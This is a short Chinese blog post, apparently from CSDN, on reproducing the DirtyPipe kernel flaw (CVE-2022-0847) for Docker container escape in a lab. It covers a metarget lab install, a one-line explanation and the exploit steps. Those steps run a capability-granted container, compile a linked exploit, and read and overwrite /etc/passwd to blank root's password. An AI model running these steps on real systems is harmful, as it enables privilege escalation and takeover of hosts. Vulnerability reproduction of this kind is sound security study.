Docker Dirtypipe（CVE-2022-0847）漏洞复现与分析容器逃逸

信安成长日记

已于 2023-08-09 10:38:14 修改

阅读量1k

点赞数

分类专栏：漏洞复现与分析文章标签：容器安全

于 2023-08-07 16:48:41 首次发布

本文链接：https://blog.csdn.net/SHELLCODE_8BIT/article/details/132149818

版权

漏洞复现与分析专栏收录该内容

12 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了Docker的DirtyPipe漏洞（CVE-2022-0847）的复现过程，探讨了其原理，即通过写只读内存实现对映射内存的篡改。并分享了GitHub上的EXP利用代码，以及相关的参考资源，包括如何利用此漏洞实现容器逃逸。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

安装环境

./metarget cnv install cve-2022-0847 --verbose

原理

同脏牛，通过写只读内存，对映射的内存做篡改

EXP


docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu

如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"错误则运行下列命令

docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntu

gcc dp.c -o dp

读系统文件：/exp/dp /etc/passwd

写系统文件 /exp/dp /etc/passwd 1 ootz:

GitHub - greenhandatsjtu/CVE-2022-0847-Con